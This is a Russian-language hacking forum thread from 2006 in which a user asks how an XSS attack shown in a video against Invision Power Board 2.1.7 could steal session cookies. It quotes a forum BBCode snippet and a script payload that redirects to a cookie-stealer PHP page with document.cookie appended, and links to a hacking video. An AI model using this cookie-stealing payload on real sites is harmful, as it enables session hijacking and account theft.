ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу xss без документ.куи?
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

xss без документ.куи?
  #1  
Старый 04.10.2006, 07:43
Аватар для gemaglabin
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825

Репутация: 4451


По умолчанию xss без документ.куи?
Недавно на одном из зарубежных порталов скачал видео по демонстрации xss на ipb 2.1.7

Код темы форума хекера был такой

Код:
[урлl=http://путь к гиф файлу][имг]просто картинка][/имг]
Gif файл

Код:
<SCRIPT>location.href='http://127.0.0.1/cookiestealer.php?cookie='+escape(document.cookie)</SCRIPT>
После обращения к линку у хекеря в логах осталась его сессия.Как такое возможно,если в линке в теме топика не передается документ.куки а те куки что уже в гиф файле будут куки не с форума?

Попробовал на локалхосте,естествено,нуле вой результат )

Кому интересно могу даю линк на видео,но в отличие от нас,у них размеры видео начиная с 30 мегов и выше

http://rapidshare.de/files/33563512/Video_4_Hacking-Truths.NeT.rar.html

Ну ведь бред да?
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IE XSS Kit .Slip Чаты 22 23.10.2006 06:45
XSS worms Xex Статьи 0 02.10.2006 01:49
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Можно ли провести Xss без знака = ? F_taker Уязвимости 2 22.04.2006 13:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ